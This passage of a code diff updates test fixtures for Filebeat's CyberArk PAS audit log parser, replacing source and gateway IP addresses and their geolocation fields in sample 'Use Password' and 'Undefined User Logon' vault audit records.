-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:54</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:54</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 15 03:31:54",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "use password",
@@ -652,7 +609,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 19395,
+        "log.offset": 19377,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -661,24 +618,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -704,22 +658,17 @@
         "cyberarkpas.audit.ca_properties.user_name": "testark",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:08:26Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:26</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:26</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 15 07:08:26",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "use password",
@@ -741,7 +690,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 22067,
+        "log.offset": 22043,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -750,24 +699,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -793,22 +739,17 @@
         "cyberarkpas.audit.ca_properties.user_name": "testark",
         "cyberarkpas.audit.desc": "Use Password",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
-        "cyberarkpas.audit.gateway_station": "34.71.250.247",
+        "cyberarkpas.audit.gateway_station": "81.2.69.143",
         "cyberarkpas.audit.iso_timestamp": "2021-03-16T10:04:49Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Use Password",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:49</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:49</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:49Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>308</MessageID>\n    <Desc>Use Password</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Use Password</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Use Password</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 16 03:04:49",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "use password",
@@ -830,7 +771,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 25521,
+        "log.offset": 25491,
         "log.syslog.priority": "5",
         "network.direction": "external",
         "observer.hostname": "VAULT",
@@ -839,24 +780,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log
index 18c5b7e67fbb..ca3e7faa7332 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log
@@ -1,5 +1,5 @@
 <7>1 2021-03-08T18:31:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:31:52","IsoTimestamp":"2021-03-08T18:31:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansr","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}}
 <7>1 2021-03-08T18:32:03Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:03","IsoTimestamp":"2021-03-08T18:32:03Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adriansra","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"10.0.1.20"}}}
-<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:43:26</Timestamp>\n    <IsoTimestamp>2021-03-11T16:43:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PSMAdmin</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}}
-<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>adrian</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>81.32.170.205</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.32.170.205"}}}
-<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:28:00</Timestamp>\n    <IsoTimestamp>2021-03-14T13:28:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>testark</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>34.71.250.247</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"34.71.250.247"}}}
+<7>1 2021-03-11T16:43:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:43:26</Timestamp>\n    <IsoTimestamp>2021-03-11T16:43:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PSMAdmin</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:43:26","IsoTimestamp":"2021-03-11T16:43:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"PSMAdmin","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":""}}}
+<7>1 2021-03-11T17:46:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:28</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>adrian</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>127.0.0.1</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>67.43.156.14</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:28","IsoTimestamp":"2021-03-11T17:46:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"adrian","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"67.43.156.14"}}}
+<7>1 2021-03-14T13:28:00Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:28:00</Timestamp>\n    <IsoTimestamp>2021-03-14T13:28:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>309</MessageID>\n    <Desc>Undefined User Logon</Desc>\n    <Severity>Error</Severity>\n    <Issuer>testark</Issuer>\n    <Action>Undefined User Logon</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Undefined User Logon</Message>\n    <GatewayStation>81.2.69.143</GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:28:00","IsoTimestamp":"2021-03-14T13:28:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"309","Desc":"Undefined User Logon","Severity":"Error","Issuer":"testark","Action":"Undefined User Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Undefined User Logon","GatewayStation":"81.2.69.143"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/309_undefined_user_logon.log-expected.json
index 616c854c567a..d70a1c12d699 100644
